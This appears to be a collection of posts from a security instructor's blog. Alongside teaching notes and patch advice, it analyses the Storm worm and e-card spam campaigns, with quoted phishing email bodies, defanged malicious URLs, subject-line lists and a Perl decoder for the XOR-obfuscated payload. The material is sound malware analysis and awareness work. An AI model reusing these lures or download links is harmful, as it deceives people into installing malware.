Security Visualization paper

I'm working on the paper I will deliver at SANS CDI, Visualization of Network Attacks.

I decided to visualize the classic Mitnick vs Shimomura attack using DAVIX, Afterglow, and Graphviz' twopi. I generated connection data in CSV format based off Tsimomura's excellent post mortem he posted to Usenet.

This image shows the connection between the source, destination, and TCP sequence number used in the attack. SYN packets are blue, the sole ACK (the forged connection from server to xterminal) is green.

Out-of-cycle patch from Microsoft

Microsoft released MS 08-067 as an emergency patch today. The Internet Storm Center has more information.

The big question I always ask with any MS patch is: is it 'wormable'? Could a self-propagating worm be written to exploit this vulnerability, and automatically infect remote systems? We haven't had a widespread one in a few years (going back to the Blaster and Sasser outbreaks).

Based on the patch MS08-067 replaces, MS06-040, my thinking is 'probably wormable'. A variant of the Mocbot bot/worm exploited MS06-040.

My advice: patch now.

SANS CDI Talk

Just a quick note to say I'll be delivering a talk at SANS CDI this December, titled Visualization of Network Attacks.

CISSP in Pittsburgh

I just got back from teaching MGT 414 in Pittsbugh, PA. I taught on short notice, didn't book my plane,. etc., until 2 days before my flight.

I had never been to Pittsbugh before, so it was nice to check out the city. Steeler mania is certainly in full swing. I was also lectured on the wisdom of the Jason Bay trade from a cabbie (who took offense when I mentioned I 'missed' Manny). Both have been clutch in the postseason thus far, so I can't argue.

The nice thing about the Community SANS courses is the smaller classes allow a lot of networking between students.

I had a great time with the students; one student happened to live across the street from the hotel, and threw a dinner party for the class on Friday night. I can honestly say that a home-cooked meal is worth its weight in gold while on the road. Thanks, Nicole!

Security 560 in Minneapolis

I just arrived in Minneapolis, and will be teaching SANS Security 560, Network Penetration Testing and Ethical Hacking, this week.

Going Independent

I recently left my full-time employer, and became an independent information security consultant.

Juggling my SANS teaching duties as a full-time employee had become very challenging, and I was faced with turning down teaching opportunities. Not something I was interested in doing, especially now that I've been given the opportunity to teach Ed Skoudis' excellent new Network Penetration Testing and Ethical Hacking course in Minneapolis.

SANS Security West 2008

I'll be attending SANS Security West 2008 beginning May 11th, teaching MGT 414, SANS® +S™ Training Program for the CISSP® Certification Exam.

Lost Laptops Might Sink Ships

As part of my SANS Technology Institute MSISE degree program I gimp-ed a public domain World War II poster (with the famous catchphrase 'Loose Lips Might Sink Ships') to create an old-school laptop encryption security awareness poster titled 'Lost Laptops Might Sink Ships.'

I enjoyed creating this one, and plan to create a series of four security awareness posters.

http://www.sans.edu/resources/student_projects/

The next SANS CISSP® @Home begins in August

Time flies! I just completed the most recent SANS MGT 414, CISSP® @Home class last Wednesday. I had a blast.

The next @Home class was just announced, beginning August 18th. Same as last time, 14 classes, running Monday's and Wednesdays from 7-10PM Eastern time.

http://www.sans.org/athome/details.php?nid=11734

Interview with Dr. Anton Chuvakin

Stephen Northcutt has an interesting interview with Dr. Anton Chuvakin regarding system logs, the bane of many a system admin's existence.

Heap 'Off By 1' Overflow Illustrated

I delivered a presentation at SANS CDI 2007 last Sunday, titled Heap 'Off By 1' Overflow Illustrated. It was based on my GCIH Gold paper A Heap o’ Trouble, Heap-based flag insertion buffer overflow in CVS.

The attack is a few years old now, but the 'off by one' technique is interesting: the attacker has a single unaccounted 'M' at his/her disposal, and that is enough to seize control of program execution. The shellcode is dropped in one character at a time, by subverting the heap's unlink process. I was able to follow the attack, byte-by-byte, thanks to liberal use of libvoodo, and some perl scripts.

The attack's author, vl4d1m1r of Ac1dB1tch3z, wrote his own analysis earlier this year in Phrack 64.

Fellow Sans Technical Institute student Manuel Humberto Santander Pelaez also delivered a presentation at CDI 2007 on Antiforensics.

...Eric

Detecting Spam with Genetic Regular Expressions

My GIAC Certified Intrusion Analyst (GCIA) Gold paper was accepted today: Detecting Spam with Genetic Regular Expressions.

The concept behind the paper is to see if regexes may be 'evolved' via genetic algorithms to detect and block spam.

Short answer: it works. For more details (including POC code), check out the paper.

Many thanks to my GCIA Gold adviser Johannes Ullrich!

I'd love to hear any feedback on the paper.

Community SANS Boston 2007 day 4

I'm blogging live from Community SANS Boston 2007.

Today we finished up the Crypto domain, and completed Operations Security. Loads of great comments from class. We discussed fairness (and legality) in regards to internet history searches. Many of us had been in the position where a manger will say "John Doe is wasting time on the internet: show me a history of his internet usage."

I believe that you don't use technology to solve a personnel problem. If an employee is 'wasting time' on the internet, they could be wasting time in other ways, such as on the phone, long breaks, playing games, etc. It's not a technology problem; it's a management problem.

If you were to discipline 'John' for non-business internet usage, you should ask yourself: how many other employees use the internet just as much (or more) for non business purposes? Are you holding them to the same level of scrutiny as you are holding John? If not, you may have legal issues.

Nick brought in a few books today, including the aformentioned The Code Book by Simon Singh. Also the classics The Cuckoo's Egg by Clifford Stoll, and The Art of Deception by Kevin Mitnick.

The Code Book opens with the Story of Mary Queen of Scots: she was executed for attempting to overthrow the British throne, and implement Catholic rule in Britain. Often left out of the history books is the fact that cryptanalysis lead to her death: Queen Elizabeth was hesitant to execute her cousin, until the proof of treason was revealed when Mary's encrypted letters were decrypted.

Community SANS Boston 2007 day 3

I'm blogging live from Community SANS Boston 2007. Right now the Red Sox are on, and winning game 1 of the World Series 6-1.

We started on the Crypto domain today; my favorite domain. The history of crypto is fascinating: the course of history has changed due to crypto. I recommended The Codebreakers by David Kahn to my students; it is a fantastic history of crypto, up through the late 1960s. The story of the Japanese Purple Machine is fascinating. Cracking the purple machine saved untold thousands of lives, shaved years off World War II in the Pacific theater, lead to a decisive victory in the Battle of Midway Island, and changed the course of the war.

Miguel, one of my students, recommended The Code Book by Simon Singh, and Cryptonomicon by Neal Stephenson. I have added them to my Amazon list.

Community SANS Boston 2007 day 1

Community SANS Boston 2007 began today; I thought day 1 went very well.

Mike, a gentleman who attended my Incident Handling/Hacker Techniques class last year, decided to pursue the CISSP® certification and attended this class. After earning his GCIH last year, he was promoted and now heads up a security team at his company. He decided it was time to round out his information security management knowledge. It's always great to see repeat students!

We have a great cross-section of industries represented in class, including some military and financial folks.

We covered the Access Control Systems & Methodology today. A universal point that came up today: access control is hard, and often thankless. We often see a litany of access requests, with many folks clearly requesting more access than is required. Users can be quite vocal when access is denied or limited, and we never hear "Great job on access control today! You really nailed it!!"

A few questions from today:

Q: Are the questions on the CISSP® in domain order, or randomized?
A: The questions are in random order.

Q: What are the new CISSP® experience requirements as of Oct 1st, 2007?
A: (ISC)2 now requires 5 years of experience in two or more domains in the Common Body of Knowledge (and you may subtract 1 year with a 4-year degree). This is a change from the old rules, which required 4 years of experience in one of the domains in the Common Body of Knowledge. See the new CISSP® experience requirements.

As an FYI, the next CISSP® @Home starts in January.

Community SANS Boston 2007

Community SANS Boston 2007 begins October 22nd. I'll be teaching MGT 414, SANS® +S™ Training Program for the CISSP® Certification Exam.

Looks like the next SANS CISSP® @Home will begin in late November. I'll post the schedule once it's official.

Storm worm now warns of RIAA investigation

The latest change in the ongoing Storm Worm assault is email warning of RIAA investigations. Here are some Subject lines from this AM:

• Subject: Big brother is watching you.
• Subject: Careful, you.re being watched.
  
• Subject: Do you know who is watching you?
• Subject: The things you do online are being watched.
• Subject: What you do online is no longer private.
  
• Subject: You are being watched online.
• Subject: Your Privacy is being violated
  
• Subject: Your online activities are no longer safe.
• Subject: Your online life is not private
• Subject: Your privacy is no longer safe
  

There are various bodies; here's an example:

If you download music of other files, you're being tracked. The RIAA is after everyone they can find. Our program will eliminate any trace to you. Keep your right to privacy safe, and download our software for free.

The emails point to an IP address, suggesting you "Download Tor". The resulting webpage points to 'tor.exe', which Avira identifies as Worm/Stom.tck"

'Ecard' spams are now showing 'abnormal activity'

The 'Ecard' spams have now switched over to 'abnormal activity' spams. Here's a summary of the subject lines:

• Subject: ATTN!
• Subject: Alert!
• Subject: Malware Alert
  
• Subject: Spyware Alert!
• Subject: Spyware Detected!
• Subject: Trojan Alert!
• Subject: Trojan Detected!
• Subject: Virus Activity Detected!
  
• Subject: Warning!
• Subject: Worm Activity Detected!
• Subject: Worm Alert!
• Subject: Worm Detected!

Here's an example body:
-------------------------------------
Dear Customer,

Our robot has detected an abnormal activity from your IP adress
on sending e-mails. Probably it is connected with the last epidemic
of a worm which does not have official patches at the moment.

We recommend you to install http://XX.71.238.156/?7c634591933434671c16a2e59b1283bd17061a8 to remove worm files and stop email sending, otherwise your account will be blocked.

Customer Support
-------------------------------------

The exe on the linked site is now called 'patch.exe,' which is identified as 'Trojan horse TR/Small.DBY.DB' by Avira.

4th of July ecard malware

The 'ecard' spam wave has been updated with 4th of July-themed subjects:

• Subject: 4th Of July Celebration
• Subject: America the Beautiful
• Subject: America's 231st Birthday
• Subject: American Pride, On The 4th
• Subject: Americas B-Day
• Subject: Celebrate Your Nation
• Subject: Celebrate Your Independence
• Subject: Fireworks on The 4th
• Subject: Fourth of July Party
• Subject: God Bless America
• Subject: Happy 4th of July
• Subject: Happy B-Day USA
• Subject: Happy Birthday America
  
• Subject: Happy Fourth of July
• Subject: Independence Day At The Park
• Subject: Independence Day Celebration
• Subject: Independence Day Party
• Subject: July 4th B-B-Q Party
• Subject: July 4th Family Day
• Subject: July 4th Fireworks Show
• Subject: Your Nations Birthday

The Internet Storm Center has a writeup.

The malware is the same as the last wave. The index.html file contains an obfuscated hex-encoded payload. The current ecard.exe (the executable is updated frequently, in order to evade virus scanners) currently scans as 'TR/Small.DBY.DB' by Avira.

Here's a sample email body:
-----------------------------------------------------------------------
Hi. Family member has sent you a greeting ecard.
See your card as often as you wish during the next 15 days.

SEEING YOUR CARD

If your email software creates links to Web pages, click on your
card's direct www address below while you are connected to the Internet:

http://XX.162.62.131/?32c3a9ebeed435601e5ee7

Or copy and paste it into your browser's "Location" box (where Internet addresses go).

PRIVACY
Postcard.com honors your privacy. Our home page and Card Pick Up have links to our Privacy Policy.

TERMS OF USE
By accessing your card you agree we have no liability.
If you don't know the person sending the card or don't wish to see the card, please disregard this Announcement.

We hope you enjoy your awesome card.

Wishing you the best,
Postmaster,
Postcard.com

More greeting card spam

The greeting card spam wave continues. Subject lines vary somewhat; here's a sampling from today:

• You've received a greeting card from a class-mate!
• You've received a greeting card from a colleague!
• You've received a greeting card from a family member!
• You've received a greeting card from a friend!
• You've received a greeting card from a neighbor!
• You've received a greeting card from a school mate!
• You've received a greeting ecard from a class-mate!
• You've received a greeting ecard from a colleague!
• You've received a greeting ecard from a family member!
• You've received a greeting ecard from a friend!
• You've received a greeting ecard from a neighbour!
• You've received a greeting ecard from a partner!
• You've received a greeting ecard from a worshipper!
• You've received a greeting postcard from a colleague!
• You've received a greeting postcard from a family member!
• You've received a greeting postcard from a friend!
• You've received a postcard from a class-mate!
• You've received a postcard from a colleague!
• You've received a postcard from a family member!
• You've received a postcard from a partner!
• You've received an ecard from a partner!
• You've received an ecard from a worshipper!

They are now linking to IP addresses (as opposed to .hk sites in the early stages).

The Internet Storm Center has an excellent analysis.

Here's a sample 'index.html' file:


The hex code goes on for awhile:


The file is obfuscated with XORed hexadecimal. The key in this case is '227' (it changes with each copy, for a simple form of polymorphism). This perl snippet will decode the XORed hex:

perl -e 'while(<>){
s/\\x([a-f0-9]{2})/chr(227)^pack(C,hex($1))/eg;print;}'

If you are analyzing your own code, change the '227' in the perl code to match the key in the index.html file.

The de-obfuscated code looks like this:


Among other nastiness, it retrieves the file http://XX.252.250.104/file.php, which is really a Windows executable that BitDefender identifies as: "Generic.Malware.dld!!.2526793B"